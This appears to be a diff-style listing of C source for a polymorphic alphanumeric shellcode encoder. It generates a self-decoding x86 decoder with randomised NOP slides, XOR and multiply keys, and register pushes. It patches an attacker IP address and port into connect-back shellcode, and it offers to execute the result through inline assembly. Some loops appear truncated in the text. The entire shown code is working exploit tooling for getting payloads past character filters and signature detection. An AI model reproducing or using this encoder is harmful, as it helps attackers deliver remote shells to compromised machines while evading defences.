| | - // | | - // TODO: | | - // .--(first byte ^ second byte) * third byte | | - // '--(second byte ^ first byte) * third byte | | - // | | - // .--(first byte ^ third byte) * second byte | | - // '--(third byte ^ first byte) * second byte | | - // | | - // .--(second byte ^ third byte) * first byte | | - // '--(third byte ^ second byte) * first byte | | - // | | - // .--(first byte * second byte) ^ third byte | | - // '--(second byte * first byte) ^ third byte | | - // | | - // .--(first byte * third byte) ^ second byte <-- decoder/encoder implemented | | - // '--(third byte * first byte) ^ second byte <-- decoder implemented (same encoder) | | - // | | - // .--(second byte * third byte) ^ first byte | | - // '--(third byte * second byte) ^ first byte | | - // | | - // | | - // The above is divided into pairs, each pair has the same values (in parenthesis) just at different offsets, | | - // and we can switch them around with no effect. Each option requires a different decoder, but each pair can use the | | - // same encoder. | | - // | | - /////////// DECODER HEAD (will be randomized by sliding instructions) //////// >----------------------------------|----|---. - /* 1*/ '\x50', //push ??? (this can change) // [eax = address of decoder]------+ | | | - /* 2*/ '\x50', //push ??? (this can change) // [ecx = address of decoder]------+ | | | - /* 3*/ PUSH_REGISTER_WITH_DECODER_ADDRESS, //push reg (decoder address) // [edx = address of decoder]------+ | | | - /* 4*/ PUSH_REGISTER_WITH_DECODER_ADDRESS, //push reg (base offset for cmp) // [ebx = address of decoder]------+ | | | - /* 5*/ '\x50', //push ??? (this can change) // [esp = address of decoder]------+ | | | - /* 7*/ '\x6A', half_size_decoder, //push 35h (word offset for cmp) // [ebp = decoder size / 2]--------+ | | | - /*12*/ '\x68', END_OF_ENCODED_SHELLCODE, //push END_OF_ENCODED_SHELLCODE // [esi = 4 bytes terminating key]>+ | | | - /*13*/ '\x50', //push ??? 
(this can change) // [edi = address of decoder]------+ | | | - /*14*/ '\x61', //popad // [set all registers] <-----------' | | | - /*16*/ '\x6A', xor_al1, //last decoder byte=0xB1 //push XOR_AL1 [JNE_XOR1^0xFF=al^JNE_XOR2=last byte==0xB1] >----. | | | - /*17*/ '\x58', //pop eax <-------------------------------------------------' | | | - /*19*/ '\x34', xor_al1, //xor al,XOR_AL1 [al = 0x00] | | | - /*20*/ '\x48', //dec eax [al = 0xFF] [you can play with AL here...]<----' | | - /*22*/ '\x34', jne_xor1, //xor al,JNE_XOR1 [al = 0xFF ^ JNE_XOR1] | | - /*25*/ '\x30', '\x42', size_decoder-1, //xor byte ptr [edx+size],al >--change-last-byte--. | | - /*26*/ '\x52', //push edx [save decoder address on stack] | | | - /*27*/ '\x52', //push edx >----. | | | - /*28*/ '\x59', //pop ecx <------' [ecx = address of decoder] | | | - /*29*/ '\x47', //inc edi we increment ebx keeping the decoder | | | - /*30*/ '\x43', //inc ebx length non-even (edi is unused) | | | - //////////////// DECODER_LOOP_START /////////////////////////////////////////// | | | - /*31*/ '\x58', //get address of the decoder //pop eax <---------. <--|-----------------. | | - /*32*/ '\x52', //save edx //push edx [can use edx now]>---------------|----|---------------. | | | - /*33*/ '\x51', //save ecx //push ecx [can use ecx now] >------------|----|-------------. | | | | - /*34*/ '\x50', //save address of decoder //push eax [can use eax now] >---------|----|-----------. | | | | | - /*35*/ '\x50', //save eax //push eax >----. | | | | | | | | - /*36*/ '\x5A', //restore into edx //pop edx <------' | | | | | | | | - /*38*/ '\x6A', xor_al2, //zero out al //push XOR_AL2 [al = 0] >----. | | | | | | | | - /*39*/ '\x58', //zero out al //pop eax | | | | | | | | | - /*41*/ '\x34', xor_al2, //zero out al //xor al,XOR_AL2 <----------' | | | | | | | | - /*42*/ '\x50', //save al on the stack (al=0)//push eax >-----------------. 
| | | | | | | | - /*45*/ '\x32', '\x42', offset_imul_key, //xor al,byte ptr [edx+off] | | | | | | | | | - /*48*/ '\x30', '\x42', offset_imul_key, //xor byte ptr [edx+off],al >--this-zero's-the-key----. | | | | | | - /*49*/ '\x58', //restore al from the stack (al=0)//pop eax <----------------------' | | | | | | | | | - /*52*/ '\x32', '\x41', size_decoder+2, // get key in al //xor al,byte ptr [ecx+size+2] | | | | | | | | | - /*55*/ '\x30', '\x42', offset_imul_key, //xor byte ptr [edx+off],al >---this-changes-the-key--|----. | | | | | | - /*56*/ '\x58', //restore address of decoder //pop eax <---------------------------------|----|---|----|--' | | | | | - /*57*/ '\x59', //restore ecx [word offset] //pop ecx <------------------------------|----|---|----|----' | | | | - /*58*/ '\x5A', //restore edx [byte offset] //pop edx <---------------------------|----|---|----|------' | | | - /*59*/ '\x50', //save address of decoder //push eax >---------------------------------|----|---|----|--------' | | - /////////// START NOP_SLIDE_1 ///////////////////////////////////////////////// | | | | | | - /*60*/ '\x41',/////////////////////////////////////inc ecx/////////////////////////// | | | | | | - /*61*/ '\x49',/////////////////////////////////////dec ecx/////////////////////////// | | | | | | - /*62*/ '\x41',/////////////////////////////////////inc ecx/////////////////////////// | | | | | | - /*63*/ '\x49',/////////////////////////////////////dec ecx+-----------------------+// | | | | | | - /*64*/ '\x41',// IMUL can go here and bellow //inc ecx| |// | | | | | | - /*65*/ '\x49',// //dec ecx| 16 bytes |// | | | | | | - /*66*/ '\x41',// //inc ecx| NOP slide |// | | | | | | - /*67*/ '\x49',// //dec ecx| |// | | | | | | - /*68*/ '\x41',// //inc ebx| can mungle eax until |// | | | | | | - /*69*/ '\x49',// will be randomized //dec ebx| IMUL_INSTRUCTION |// | | | | | | - /*70*/ '\x41',// //inc edx| |// | | | | | | - /*71*/ '\x49',// //dec edx| |// | | | | | | - /*72*/ '\x41',// //inc esi| 
|// | | | | | | - /*73*/ '\x49',// //dec esi+-----------------------+// | | | | | | - /*74*/ '\x41',// //push eax/////////////////////////// | | | | | | - /*75*/ '\x49',// //pop eax//////////////////////// // | | | | | | - //////////// END NOP_SLIDE_1 ////////////////////////////////////////////////// | | | | | | - // | | | | | | - // We can move around the IMUL_INSTRUCTION inside the NOP slides - but not before | | | | | | - // MAX_OFFSET_OFFSET_IMUL i.e. we can't move it before the first 4 bytes of NOP_SLIDE_1 | | | | | | - // or the offset will not be alphanumeric. | | | | | | - // | | | | | | - // We need to move the IMUL_INSTRUCTION in two byte increments, as we may modify eax in | | | | | | - // NOP_SLIDE_1 and we can't change eax after the IMUL_INSTRUCTION (as the result goes | | | | | | - // into eax) - this limitation can be overcome if we make sure not to modify eax after | | | | | | - // the IMUL_INSTRUCTION - and it is easy enough, as we don't care about eax' value at | | | | | | - // all - so we don't need to restore it. We can simply increment or decrement an unused | | | | | | - // register instead. We happen to have such a register - edi =] | | | | | | - // | | | | | | - // So in NOP_SLIDE_1, we can't use push eax;pop eax unless they will not be split by | | | | | | - // the IMUL_INSTRUCTION - because we would need the value of eax after the imul, and | | | | | | - // the pop eax would overwrite it | | | | | | - // | | | | | | - // But we could use a dec eax;inc edi or a dec eax;dec edi combinations (inc eax is not | | | | | | - // alphanumeric.). | | | | | | - // | | | | | | - // -OBSOLETE- | | | | | | - // I have set here the IMUL_INSTRUCTION between NOP_SLIDE_1 and NOP_SLIDE_2 | | | | | | - // If you wish to move it up, you will need to move it up by an even number of bytes. 
| | | | | | - // You will then need to change OFFSET_OFFSET_IMUL accordingly | | | | | | - // (add the number of bytes to it) | | | | | | - // If you wish to move it down, you will need to move it down by an even number of | | | | | | - // bytes. | | | | | | - // You will then need to change OFFSET_OFFSET_IMUL accordingly | | | | | | - // (deduct the number of bytes from it) | | | | | | - // | | | | | | - // TODO: make a routine that moves it around randomally between allowed values | | | | | | - // and sets the proper offsets | | | | | | - // this routine should be called after the NOP slides have been randomized. | | | | | | - // | | | | | | - ////////// START NOP_SLIDE_2 //////////////////////////////////////////////////// | | | | | | - /*76*/ '\x41',// //inc ecx/////////////////////////// | | | | | | - /*77*/ '\x49',// //dec ecx/////////////////////////// | | | | | | - /*78*/ '\x41',// //inc ebx/////////////////////////// | | | | | | - /*79*/ '\x49',// //dec ebx+-----------------------+// | | | | | | - /*80*/ '\x41',// will be randomized //inc edx| |// | | | | | | - /*81*/ '\x49',// //dec edx| 12 bytes |// | | | | | | - /*82*/ '\x41',// //inc esi| NOP slide |// | | | | | | - /*83*/ '\x49',// //dec esi| |// | | | | | | - /*84*/ '\x41',// //push eax| |// | | | | | | - /*85*/ '\x49',// //pop eax| |// | | | | | | - /*86*/ '\x41',// //inc ecx+-----------------------+// | | | | | | - /*87*/ '\x49',// //dec ecx/////////////////////////// | | | | | | - // IMUL can go down to here | | | | | | - ///////// [step_1] //imul eax,dword ptr [ecx+size_decoder+1],45h | | | | | | - /*91*/imul_instruction_1, imul_instruction_2, imul_instruction_3, imul_instruction_4,// <-This-key-will-change-' | | - ////////// END NOP_SLIDE_2//////////////////////////////////////////////////// | | | | - /*92 */ '\x41', //ecx incremented once //inc ecx ---------------------. 
| | | | - /*95 */ '\x33', '\x41', size_decoder, //[step_2]//xor eax,dword ptr [ecx+size] | <--------------------store decoded | | - /*98 */ '\x32', '\x42', size_decoder, //xor al,byte ptr [edx+size] |ecx = ecx+2 | | byte | | - /*101*/ '\x30', '\x42', size_decoder, //xor byte ptr [edx+size],al | | |(eax=result of IMUL) | | - /*102*/ '\x41', //ecx incremented twice //inc ecx ---------------------' | | | | - /*103*/ '\x42', //edx incremented once //inc edx edx = edx+1 | | | | - /*104*/ '\x45', //ebp incremented once //inc ebp | | | | - /*107*/ '\x39', '\x34', '\x6B', //cmp dword ptr [ebx+ebp*2],esi // check if we reached the end | | - /*109*/ '\x75', jne_xor2, // <===0xB1 //jne DECODER_LOOP_START >--------------' <--' | | - '\x00' // If you change the length of the decoder, the jne would need to jump to a different offset than 0xB1 | | - };////////////////////////////////////////////////// | | - UINT shrink; // | | - UCHAR *found_msg; // | | - UCHAR *p_decoder = decoder; // | | - UCHAR xor1, xor2, key; // | | - UCHAR temp_buf[3] = ""; // | | - UCHAR alnum_shellcode[MAX_ENCODED_SHELLCODE] = "";// | | - UCHAR *p_alnum_shellcode = alnum_shellcode; // todo: allow for the key to be either the first, | | - struct xor2_key *p_xor2_key = 0; // the second or the third byte (currently third). 
| | - UCHAR *p_shellcode = shellcode; // | | - void *_eip = 0; // | | - // | | - int offset_nop_slide1; // | | - int offset_nop_slide2; // | | - int offset_half_size_decoder; // | | - int offset_terminating_key; // | | - int offset_imul_instruction1; // | | - int offset_imul_instruction2; // | | - int offset_imul_instruction3; // | | - int offset_imul_instruction4; // | | - int negative_offset_size_decoder1; // | | - int negative_offset_size_decoder2; // | | - int negative_offset_size_decoder3; // | | - int offset_size_decoder_min_1; // | | - int offset_size_decoder_pls_2; // | | - int offset_imul_key_offset1; // | | - int offset_imul_key_offset2; // | | - int offset_imul_key_offset3; // | | - int offset_imul_instruction; // | | - int size_nop_slide1; // | | - int size_nop_slide2; // | | - int offset_jne_xor1; // | | - int offset_jne_xor2; // | | - int decoder_length_section1; // | | - int decoder_length_section2; // | | - int decoder_length_section3; // | | - int imul_instruction_length; // | | - int jne_xor_negative_offset; // | | - int backward_slide_offset; // | | - BOOL decoder_version_1; // | | - UINT srand_value; // | | -#ifdef CONNECT_BACK_SHELLCODE ///////////////////////////////////////////// | | - printf("scanning EncodedShellcode for shellcode up to OFFSET_IP_ADDRESS bytes\n"); // | | - found_msg = scan_str_known_pattern(EncodedShellcode, shellcode, OFFSET_IP_ADDRESS); // | | - if (found_msg) printf("shellcode found encoded in EncodedShellcode using %s.\n", found_msg); // | | - else printf("shellcode not found encoded in EncodedShellcode.\n");///////////////////////////// | | -#endif ////////////////// | | - printf("shellcode length:%d\n", size); // | | - srand_value = time(NULL); // | | -// srand_value = ; // for debugging | | - srand(srand_value); // | | - printf("srand value=%d\n", srand_value); // | | - decoder_version_1 = rand() % 2; // | | - ///// | | - size_decoder = strlen(decoder);// | | - decoder_length_section1 = 30; ////////////// | | - 
decoder_length_section2 = 29; // | | - decoder_length_section3 = 18; // | | - // | | - size_nop_slide1 = 28; // | | - size_nop_slide2 = 0; // | | - // | | - imul_instruction_length = 4; // | | - // | | - shrink = (rand()%6)*2; //////////////////////////////////////////////////// (can shrink up to 10 bytes | | - memmove(decoder+decoder_length_section1+decoder_length_section2+size_nop_slide1-shrink, // in 2 byte increments) | | - decoder+decoder_length_section1+decoder_length_section2+size_nop_slide1, // | | - imul_instruction_length+size_nop_slide2+decoder_length_section3+1); // | | - size_decoder -=shrink; /////////////////////////////////////////////////////// | | - half_size_decoder = size_decoder/2; // | | - size_nop_slide1 -=shrink; ///////////////////////// | | - printf("shrinking decoder by: %d\n", shrink); // | | - // | | - offset_imul_instruction = decoder_length_section1+// | | - decoder_length_section2+// | | - size_nop_slide1;////////// | | - // | | - backward_slide_offset = rand() % 15; // (selects a number from 0 to 14 in increments of 1) | | - strncpy(decoder, // | | - slide_substr_back(decoder, // | | - offset_imul_instruction, // | | - imul_instruction_length, // | | - size_decoder, ///// | | - backward_slide_offset), // | | - size_decoder); // | | - offset_imul_instruction -=backward_slide_offset; // | | - size_nop_slide1 -=backward_slide_offset; // | | - size_nop_slide2 +=backward_slide_offset; ////////////// | | - printf("backward_slide_offset = %d\n", backward_slide_offset);// | | - /////////////////////////////////// | | - negative_offset_size_decoder1 = 9; // | | - negative_offset_size_decoder2 = 12; // | | - negative_offset_size_decoder3 = 15; // | | - // | | - offset_half_size_decoder = 6; // | | - offset_terminating_key = 8; // | | - offset_jne_xor1 = 21; // | | - offset_size_decoder_min_1 = 24; // | | - // | | - offset_imul_key_offset1 = 14 + decoder_length_section1; // | | - offset_imul_key_offset2 = 17 + decoder_length_section1; // | | - 
offset_size_decoder_pls_2 = 21 + decoder_length_section1; // | | - offset_imul_key_offset3 = 24 + decoder_length_section1; // | | - // | | - offset_nop_slide1 = decoder_length_section1+ // | | - decoder_length_section2; // | | - offset_nop_slide2 = decoder_length_section1+ // | | - decoder_length_section2+ // | | - size_nop_slide1+ // | | - imul_instruction_length; // | | - // | | - offset_imul_instruction1 = offset_imul_instruction; // | | - offset_imul_instruction2 = offset_imul_instruction+1; // | | - offset_imul_instruction3 = offset_imul_instruction+2; // | | - offset_imul_instruction4 = offset_imul_instruction+3; // | | - // | | - // | | - offset_imul_key = offset_imul_instruction4; // | | - // | | - offset_jne_xor2 = size_decoder-1; // | | - jne_xor_negative_offset = decoder_length_section3+ // | | - decoder_length_section2+ // | | - size_nop_slide2+ // | | - imul_instruction_length+ // | | - size_nop_slide1; // | | - // | | - // | | - printf("size_decoder=0x%2X - %s\n", // | | - (UCHAR)size_decoder, ////// | | - is_alnum((UCHAR)size_decoder+(decoder_version_1?0:2))?"valid":"invalid - not alphanumeric!!!");// | | - *(decoder+offset_imul_instruction3) = size_decoder+(decoder_version_1?0:2); ////// | | - // | | - printf("half_size_decoder=0x%2X - %s\n", // | | - (UCHAR)half_size_decoder, // | | - is_alnum((UCHAR)half_size_decoder)?"valid":"invalid - not alphanumeric!!!"); // | | - *(decoder+offset_half_size_decoder) = half_size_decoder; // | | - // | | - printf("offset_imul_key=0x%2X - %s\n", // | | - (UCHAR)offset_imul_key, // | | - is_alnum((UCHAR)offset_imul_key)?"valid":"invalid - not alphanumeric!!!"); // | | - *(decoder+offset_imul_key_offset1) = offset_imul_key; // | | - *(decoder+offset_imul_key_offset2) = offset_imul_key; // | | - *(decoder+offset_imul_key_offset3) = offset_imul_key; // | | - // // | | - printf("size_decoder-1=0x%2X - %s\n", // | | - (UCHAR)size_decoder-1, // | | - is_alnum((UCHAR)(size_decoder-1))?"valid":"invalid - not 
alphanumeric!!!"); // | | - *(decoder+offset_size_decoder_min_1) = size_decoder-1; // | | - // | | - printf("size_decoder+2=0x%2X - %s\n", // | | - (UCHAR)size_decoder+2, //////// | | - is_alnum((UCHAR)(size_decoder+(decoder_version_1?2:0)))?"valid":"invalid - not alphanumeric!!!");// | | - *(decoder+offset_size_decoder_pls_2) = size_decoder+(decoder_version_1?2:0); //////// | | - // | | - *(decoder+size_decoder-negative_offset_size_decoder1) = size_decoder; // | | - *(decoder+size_decoder-negative_offset_size_decoder2) = size_decoder; // | | - *(decoder+size_decoder-negative_offset_size_decoder3) = size_decoder; ////////////////////////////// | | - // | | - *(decoder+offset_jne_xor1) = get_two_xor_complemets_for_byte_and_xor((UCHAR)(-jne_xor_negative_offset),// | | - '\xFF', // | | - 0); // | | - *(decoder+offset_jne_xor2) = get_two_xor_complemets_for_byte_and_xor((UCHAR)(-jne_xor_negative_offset),// | | - '\xFF', // | | - 1); // | | -#ifdef CONNECT_BACK_SHELLCODE // | | - ip_address = ip_str_to_dw(IP_ADDRESS);/////////////////////////////////////////////////// | | - if (ip_address == -1) /////////////////////////////////////////////////// | | - exit(-1); // | | - /////////////////////////////////// | | - //set shellcode with ip address and port for connect-back // | | - ///* ////////// | | - *((DWORD *)(p_shellcode+OFFSET_IP_ADDRESS)) = ip_address;///////////////// | | - *((DWORD *)(p_shellcode+OFFSET_TCP_PORT_NUMBER)) = my_htonl(TCP_PORT_NUMBER);// | | - *(p_shellcode+OFFSET_TCP_PORT_NUMBER) = (UCHAR)2; // | | -#endif ////////////////////////////////////////// | | - //*/ // | | - //set decoder with 'random' nop slides // | | - strncpy(decoder+offset_nop_slide1, //////////////////////////// | | - shuffle(get_nop_slide(size_nop_slide1, 1), size_nop_slide1),// | | - size_nop_slide1); // | | - strncpy(decoder+offset_nop_slide2, // | | - shuffle(get_nop_slide(size_nop_slide2, 2), size_nop_slide2),// | | - size_nop_slide2); /////////////////////////////// | | - // | | 
- //set decoder with random initial key //////////////////////////////////////////// | | - *(decoder+offset_imul_key) = get_random_alnum_value();// | | - printf("initial key=0x%2X - %s\n", ////////////// | | - (UCHAR)*(decoder+offset_imul_key), // | | - is_alnum((UCHAR)*(decoder+offset_imul_key))?"valid":"invalid - not alphanumeric!!!"); // | | - // | | - ////////////// | | - // | | - //set decoder with 'random' dword pushes for registers we won't use //////////////// | | - *(decoder+OFFSET_PUSH_DWORD1) = get_random_alnum_push_dword_opcode(); // | | - printf("push dword1=0x%2X - %s\n", // | | - (UCHAR)*(decoder+OFFSET_PUSH_DWORD1), // | | - is_alnum((UCHAR)*(decoder+OFFSET_PUSH_DWORD1))?"valid":"invalid - not alphanumeric!!!");// | | - *(decoder+OFFSET_PUSH_DWORD2) = get_random_alnum_push_dword_opcode(); // | | - printf("push dword2=0x%2X - %s\n", // | | - (UCHAR)*(decoder+OFFSET_PUSH_DWORD2), // | | - is_alnum((UCHAR)*(decoder+OFFSET_PUSH_DWORD2))?"valid":"invalid - not alphanumeric!!!");// | | - *(decoder+OFFSET_PUSH_DWORD3) = get_random_alnum_push_dword_opcode(); // | | - printf("push dword3=0x%2X - %s\n", // | | - (UCHAR)*(decoder+OFFSET_PUSH_DWORD3), // | | - is_alnum((UCHAR)*(decoder+OFFSET_PUSH_DWORD3))?"valid":"invalid - not alphanumeric!!!");// | | - *(decoder+OFFSET_PUSH_DWORD4) = get_random_alnum_push_dword_opcode(); // | | - printf("push dword4=0x%2X - %s\n", // | | - (UCHAR)*(decoder+OFFSET_PUSH_DWORD4), // | | - is_alnum((UCHAR)*(decoder+OFFSET_PUSH_DWORD4))?"valid":"invalid - not alphanumeric!!!");// | | - // | | - //bugfix: this time after srand() :) // | | - xor_al1=get_random_alnum_value(); // | | - xor_al2=get_random_alnum_value(); // | | - *(decoder+OFFSET_XOR_AL1_A) = xor_al1; // | | - *(decoder+OFFSET_XOR_AL1_B) = xor_al1; // | | - *(decoder+OFFSET_XOR_AL2_A) = xor_al2; // | | - *(decoder+OFFSET_XOR_AL2_B) = xor_al2; // | | - // | | - memcpy(decoder+OFFSET_RANDOMIZED_DECODER_HEAD, ////// | | - randomize_decoder_head(decoder, size_decoder, 
xor_al1, *(decoder+offset_jne_xor1)), // <---here-------------------------|---' - SIZE_RANDOMIZED_DECODER_HEAD); ////// | - //set first xor1 to random alnum value (this is the first byte of the encoded data) // | - xor1 = get_random_alnum_value(); // | - printf("xor1=0x%2X - %s\n", // | - (UCHAR)xor1, // | - is_alnum((UCHAR)xor1)?"valid":"invalid - not alphanumeric!!!"); // | - ///////////////////////////////////////////////////////// | -RE_RUN: // | - sprintf(alnum_shellcode, "%s",decoder); // | - memset(temp_buf, 0, 3);/////////////////// | - for(i=0; ikey; // | - xor2=p_xor2_key->xor2; // | - temp_buf[0] = xor1; // | - temp_buf[1] = xor2; // | - strcat(alnum_shellcode, temp_buf); // append it to our decoder // | - xor1=key; // | - free_p_xor2_key(p_xor2_key); // free the list // | - } //get next original_byte // | - //////////////////////// | - if (terminating_key_exist(alnum_shellcode+sizeof(decoder), str_end_of_encoded_shellcode))// | - { // | - printf("error - terminating key found in encoded shellcode. 
running again to fix\n");// | - goto RE_RUN; // | - } ///////////////////////////////////////////////////// | - *(UCHAR*)(alnum_shellcode+8) = key; // set the last key of the encoded data to be the first byte of the terminating string | - *(UCHAR*)(alnum_shellcode+9) = get_random_alnum_value(); // choose 3 random alnum bytes for the rest of the terminating string| - *(UCHAR*)(alnum_shellcode+10) = get_random_alnum_value(); // choose 3 random alnum bytes for the rest of the terminating string| - *(UCHAR*)(alnum_shellcode+11) = get_random_alnum_value(); // choose 3 random alnum bytes for the rest of the terminating string| - strncat(alnum_shellcode, // append the terminating string to the decoder+encoded shellcode | - (UCHAR*)(alnum_shellcode+offset_terminating_key), ////////////////////////////// | - 4); // | - // | - //bugfix: handle case of esp pointing to shellcode // | - if (!strcmp(Q(REGISTER_WITH_ADDRESS_OF_SHELLCODE), "esp")) // | - { // | - // _asm{ // | - // push esp; // | - // pop eax; // | - // xor al, 0x36; // | - // xor al, 0x30; // | - // } // | - p_alnum_shellcode = malloc(strlen(alnum_shellcode)+1+6); // | - memset(p_alnum_shellcode, 0, strlen(alnum_shellcode)+1+6); // | - memcpy(p_alnum_shellcode+6, alnum_shellcode, strlen(alnum_shellcode)+1); // | - p_alnum_shellcode[0] = 'T'; // | - p_alnum_shellcode[1] = 'X'; // todo: randomize by using other registers than eax // | - p_alnum_shellcode[2] = '4'; // and using other xor values // | - p_alnum_shellcode[3] = '6'; // <-- (x+6) // | - p_alnum_shellcode[4] = '4'; // // | - p_alnum_shellcode[5] = '0'; // <-- x // | - p_alnum_shellcode[8] = get_push_register_instruction("eax"); // | - p_alnum_shellcode[9] = get_push_register_instruction("eax"); // | - size_decoder += 6; // | - } // | - // | - printf("encoded shellcode length: %d\n", strlen(alnum_shellcode)-size_decoder); // | - printf("decoder length: %d\n%s\n", // | - size_decoder, // | - p_alnum_shellcode); // | - // | - printf("scanning alnum_shellcode 
for shellcode up to size bytes\n"); // | - found_msg = scan_str_known_pattern(alnum_shellcode, shellcode, size); ///////// | - if (found_msg) printf("shellcode found encoded in alnum_shellcode using %s.\n", found_msg); // | - else printf("shellcode not found encoded in alnum_shellcode.\n"); /////////////////////////// | - // | - if (str_is_alnum(alnum_shellcode)) // | - { // | - printf("execute shellcode locally? (hit: y and press enter): ");// | - if(tolower(getchar()) == 'y') // | - { ///////////// | - _asm // | - { // | - push p_alnum_shellcode; //////// | - pop REGISTER_WITH_ADDRESS_OF_SHELLCODE;// <------------------------------------------------------------------------' - //jump to head of decoder // - jmp REGISTER_WITH_ADDRESS_OF_SHELLCODE;// - } ////////////// - } // - } // - else // - { /////////////// - printf("error non-alphanumeric shellcode\n"); // - } ////////////////////////////// - ///////// - // - return 0; ////// -} // -/////////////////// - -BOOL arg1_imul_arg2_xor_arg3(UCHAR *alnum_str, - UCHAR *known_pattern, - UINT known_pattern_length, - UINT offset1, - UINT offset2, - UINT offset3) -{ - UINT offset, - i, - found; - - for (i=found=offset=0; i0;length--) { - if( - !is_alnum(str[length-1]) - ) - return 0; - } - return 1; -} - -UCHAR get_two_xor_complemets_for_byte_and_xor(UCHAR byte, UCHAR xor, int index) -{ - int xor_complement_1, xor_complement_2; - UCHAR two_xor_complements[3]; - - for(xor_complement_1=0; xor_complement_1 255 ? -1 : (x[3] <<= 24); - x[2] = x[2] > 255 ? -1 : (x[2] <<= 16); - x[1] = x[1] > 255 ? -1 : (x[1] <<= 8); - x[0] = x[0] > 255 ? 
-1 : (x[0] <<= 0); - dwIpAddress = x[0]+x[1]+x[2]+x[3]; - - - return dwIpAddress; -} - -DWORD my_htonl(DWORD dw_in) -{ - DWORD dw_out; - - *((UCHAR *)&dw_out+3) = *((UCHAR *)&dw_in+0); - *((UCHAR *)&dw_out+2) = *((UCHAR *)&dw_in+1); - *((UCHAR *)&dw_out+1) = *((UCHAR *)&dw_in+2); - *((UCHAR *)&dw_out+0) = *((UCHAR *)&dw_in+3); - - return dw_out; -} - -void free_p_xor2_key(struct xor2_key *node) -{ - struct xor2_key *temp = 0; - - if(node) - { - temp = node->prev; - while(node->next) - { - node=node->next; - free(node->prev); - } - free(node); - } - if(temp) - { - while(temp->prev) - { - temp=temp->prev; - free(temp->next); - } - free(temp); - } -} - -struct xor2_key *choose_random_node(struct xor2_key *head) -{ - int num_nodes = 1, selected_node, i; - struct xor2_key* tail = head; - - struct xor2_key* pn = NULL ; - - if (!head || !head->key) - return 0; - - while(tail->next) - { - tail = tail->next; - num_nodes++; - } - - selected_node = rand()%num_nodes; - - for(i=0; inext; - - return head; -} - -struct xor2_key *get_xor2_and_key_for_xor1_and_c(UCHAR xor1, UCHAR c) -{ - struct xor2_key *p_xor2_key, *p_xor2_key_head; - char *alnum = ALNUM_CHARSET; - UINT i=0, - z=1, - r=0, - count=0; - UCHAR xor2=0, - x=0; - - p_xor2_key_head = p_xor2_key = malloc(sizeof(xor2_key)); - p_xor2_key->prev = 0; - p_xor2_key->next = 0; - p_xor2_key->key = 0; - p_xor2_key->xor2 = 0; - - for(i=0; alnum[i]; i++) - { - for(x=0; alnum[x];x++) - { - xor2 = alnum[x]; - if (((UCHAR)(xor1 * alnum[i]) ^ xor2) == c) - { - p_xor2_key->xor2 = xor2; - p_xor2_key->key = alnum[i]; - p_xor2_key->next = malloc(sizeof(struct xor2_key)); - p_xor2_key->next->prev = p_xor2_key; - p_xor2_key = p_xor2_key->next; - p_xor2_key->key=0; - p_xor2_key->xor2=0; - } - } - } - - if(!p_xor2_key->key) - p_xor2_key->next = 0; - if (p_xor2_key->prev) - p_xor2_key = p_xor2_key->prev; - else - return 0; - free(p_xor2_key->next); - p_xor2_key->next=0; - return p_xor2_key_head; -} - -UCHAR *shuffle(UCHAR str[], UINT length) 
//length does not include terminating null. -{ - UINT last, randomNum; - UCHAR temporary; - UCHAR *output = malloc(length); - memcpy(output, str, length); - for (last = length; last > 1; last--) - { - randomNum = rand( ) % last; - temporary = output[randomNum]; - output[randomNum] = output[last-1]; - output[last-1] = temporary; - } - memcpy(str, output, length); - return output; -}// taken from: http://www.warebizprogramming.com/text/cpp/section6/part8.htm - - -UCHAR *slide_substr_back(UCHAR *str, UINT substr_offset, UINT substr_len, UINT str_len, UINT slide) -{ - UCHAR *prefix_substr, - *substr, - *suffix_substr, - *output_str; - UINT prefix_substr_len, - suffix_substr_len; - - - if(slide > substr_offset) { - printf("you can't slide it that far back!\n"); - return 0; - } - - output_str = malloc(str_len); - memset(output_str, 0 , str_len); - - suffix_substr_len = str_len-substr_len-substr_offset; - suffix_substr = malloc(suffix_substr_len); - memset(suffix_substr, 0, suffix_substr_len); - - prefix_substr_len = substr_offset; - prefix_substr = malloc(prefix_substr_len); - memset(prefix_substr, 0, prefix_substr_len); - - substr = malloc(substr_len); - memset(substr, 0, substr_len); - - strncpy(substr, str+substr_offset, substr_len); - strncpy(prefix_substr, str, prefix_substr_len); - strncpy(suffix_substr, str+substr_offset+substr_len, suffix_substr_len); - - strncpy(output_str, prefix_substr, prefix_substr_len-slide); - strncpy(output_str+prefix_substr_len-slide, substr, substr_len); - strncpy(output_str+prefix_substr_len-slide+substr_len, str+substr_offset-slide, slide); - strncpy(output_str+prefix_substr_len-slide+substr_len+slide, str+substr_offset+substr_len, suffix_substr_len); - - - free(prefix_substr); - free(suffix_substr); - free(substr); - return output_str; -} - -UCHAR *slide_substr_forward(UCHAR *str, UINT substr_offset, UINT substr_len, UINT str_len, UINT slide) -{ - UCHAR *prefix_substr, - *substr, - *suffix_substr, - *output_str; - UINT 
prefix_substr_len, - suffix_substr_len; - - - if(slide > str_len-substr_len-substr_offset) { - printf("you can't slide it that far forward!\n"); - return 0; - } - - output_str = malloc(str_len); - memset(output_str, 0 , str_len); - - suffix_substr_len = str_len-substr_len-substr_offset; - suffix_substr = malloc(suffix_substr_len); - memset(suffix_substr, 0, suffix_substr_len); - - prefix_substr_len = substr_offset; - prefix_substr = malloc(prefix_substr_len); - memset(prefix_substr, 0, prefix_substr_len); - - substr = malloc(substr_len); - memset(substr, 0, substr_len); - - strncpy(substr, str+substr_offset, substr_len); - strncpy(prefix_substr, str, prefix_substr_len); - strncpy(suffix_substr, str+substr_offset+substr_len, suffix_substr_len); - - strncpy(output_str, prefix_substr, prefix_substr_len); - strncpy(output_str+prefix_substr_len, suffix_substr, slide); - strncpy(output_str+prefix_substr_len+slide, substr, substr_len); - strncpy(output_str+prefix_substr_len+slide+substr_len, suffix_substr+slide, suffix_substr_len-slide); - - - free(prefix_substr); - free(suffix_substr); - free(substr); - return output_str; -} - -UCHAR *get_nop_slide(UINT size, UINT slide) -{ //simple alnum nop slide generator - UINT i, x, append_dec_eax = 0; - UCHAR alnum_nop[][3] = { - "AI", //inc ecx;dec ecx // (alnum_nop[0]) - "BJ", //inc edx;dec edx // (alnum_nop[1]) - "CK", //inc ebx;dec ebx // (alnum_nop[2]) - "EM", //inc ebp;dec ebp // (alnum_nop[3]) - "FN", //inc esi;dec esi // (alnum_nop[4]) - "GO", //inc edi;dec edi // (alnum_nop[5]) [we don't care about eax value before the imul] - "HG", //dec eax;inc edi // (alnum_nop[6]) --- not allowed in nop_slide_2 [instruction as it overwrites eax with result ] - "HO", //dec eax;dec edi // (alnum_nop[7]) --- not allowed in nop_slide_2 [and we don't care about edi value at all. ] - - "DL", //inc esp;dec esp // 